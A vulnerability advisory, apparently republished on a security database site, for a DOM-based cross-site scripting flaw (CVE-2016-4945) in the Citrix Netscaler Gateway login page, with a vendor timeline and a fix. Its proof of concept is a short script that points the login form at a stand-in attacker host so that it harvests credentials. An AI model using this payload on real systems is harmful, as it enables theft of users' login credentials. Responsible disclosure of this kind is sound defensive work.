Citrix Netscaler 11.0 Build 64.35 Cross Site Scripting

2016.05.31
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

PERSICON Security Advisory ======================================================================= Title: Login Form Hijacking vulnerability Product: Citrix Netscaler Vulnerable Version: 11.0 Build 64.35 Fixed Version: 11.0 Build 66.11 CVE-ID: CVE-2016-4945 Impact: medium found: 2015-04-07 by: Dr. Daniel Schliebner <dschliebner@persicon.com> http://www.persicon.com ======================================================================= Vendor Description: ------------------- "Citrix (NASDAQ:CTXS) aims to power a world where people, organizations and things are securely connected and accessible to make the extraordinary possible. Its technology makes the world's apps and data secure and easy to access, empowering people to work anywhere and at any time. Citrix provides a complete and integrated portfolio of Workspace-as-a-Service, application delivery, virtualization, mobility, network delivery and file sharing solutions that enables IT to ensure critical systems are securely available to users via the cloud or on-premise and across any device or platform. With annual revenue in 2015 of $3.28 billion, Citrix solutions are in use by more than 400,000 organizations and over 100 million users globally." (https://www.citrix.com/about.html) Vulnerability Description: -------------------------- The login page of the Citrix Netscaler Gateway web frontend is vulnerable to a DOM-based Cross-Site-Scripting (XSS) vulnerability due to improper sanitization of the content of the "NSC_TMAC" cookie. The vulnerability is located in the file /vpn/js/gateway_login_form_view.js in which the the cookie's content is - if set - written to the DOM via JavaScript. This is done in the following excerpt: var cookie_action = ns_getcookie("NSC_TMAC"); var action_url= '/cgi/login'; if (cookie_action) { action_url = cookie_action; UnsetCookie("NSC_TMAC"); This vulnerability can be exploited by an unauthorized remote attacker by forging the destination address of the login formular in order to receive login credentials of a victim. This can be achieved by for example using another XSS vulnerability on the companies web page. Proof of concept: ----------------- Assume this vulnerability resides on https://my-foobar-company.com/vpn/. Assume further, an attacker is able to set a cookie on a victims client via some other attack vector like, e.g., another XSS vulnerability. The attacker needs to first (e.g. by XSS) execute the following code on the client: <script> document.cookie='NSC_TMAC=https://attack.ers/receive/;' + ' domain=.my-foobar-company.com'; window.location.href='https://my-foobar-company.com/vpn/' </script> As a consequence, the Netscaler Gateway login formular has the url "https://attack.ers/receive/" as the value in its "action" attribute and hence a victim will sent its credentials to the attackers host when submitting the formular. Vulnerable / tested versions: ----------------------------- Citrix Netscaler 11.0 Build 65.31 Citrix Netscaler 11.0 Build 64.34 Vendor contact timeline: ------------------------ 2016-04-11: Contacting vendor through secure@citrix.com 2015-04-11: Vendor response - issue has now the case ID CASE-6597 and will be forwarded for feedback 2016-04-12: Vendor response - issue will be reviewed 2016-04-25: Vendor response - issue will be fixed 2016-05-24: Vendor response - issue is fixed in the upcoming release on 26th May 2016-05-26: Vendor response - issue is fixed in the upcoming release at 5pm PDT on 26th May 2016-05-27: Status update - fix released by vendor 2016-05-27: Coordinated release of the security advisory Solution: --------- Remove the use of the cookie content or sanitize its content properly before writing it to the DOM. References ---------- [1] http://support.citrix.com/article/CTX213313 URL --- http://persicon.com/tl_files/advisories/PERSICON-advisory-2016-No-1-citrix.t xt

References:

http://persicon.com/tl_files/advisories/PERSICON-advisory-2016-No-1-citrix.txt
http://support.citrix.com/article/CTX213313


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top